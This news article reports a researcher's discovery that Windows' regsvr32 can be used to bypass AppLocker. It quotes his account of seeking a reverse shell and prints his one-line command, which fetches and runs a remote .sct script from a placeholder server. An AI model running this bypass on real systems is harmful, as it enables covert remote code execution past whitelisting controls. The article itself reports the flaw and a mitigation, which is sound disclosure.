A security researcher has found a vulnerability in Windows that could allow hackers to install malicious software on a computer without the user’s knowledge. Casey Smith, a researcher from Colorado, discovered that regsrvr32 (regsrvr64 in 64-bit versions) – a whitelisted function in Windows, dating back to Windows 7 – can be manipulated to bypass the AppLocker security restrictions on installing programs.
“So, I have been working this out the last few days. I was trying solve a particular problem,” Smith wrote on his blog. “I needed a reverse shell on workstation locked down by AppLocker executable and script rules enforced.”
Smith’s solution to the problem looked like this:
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Effectively, he used a URL as a script, a function of regsvr that was not commonly known to exist.
“The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc… And… You guessed a signed, default MS binary. So, all you need to do is host your .sct file at a location you control,” added Smith.
The crux of Smith’s discovery is, by using regsrvr32/regsrvr64, someone can remotely execute code on a Windows machine without triggering AppLocker. While Microsoft is yet to patch the flaw, anyone concern about it can disable regsvr in either Windows Firewall or their own third-party firewall.
LIVE THE HORROR: An immersive disaster story aboard a stunningly realised North Sea oil rig,…
The Philips VA LED display uses an advanced multi-domain vertical alignment technology that gives you…
【TFT Screen: The Interactive Interface】This 75% mechanical keyboard comes equipped with a TFT Screen, serving…
FANDOM FUSION Play as your favorite characters and wield their unique weapons and skills. Team…
The Definitive Version of Shin Megami Tensei V - Fully evolved with stunning visuals for…
【Unique Split Design】5200mAh hand warmers rechargeable together with double-sided heating function, split snap swivel design,…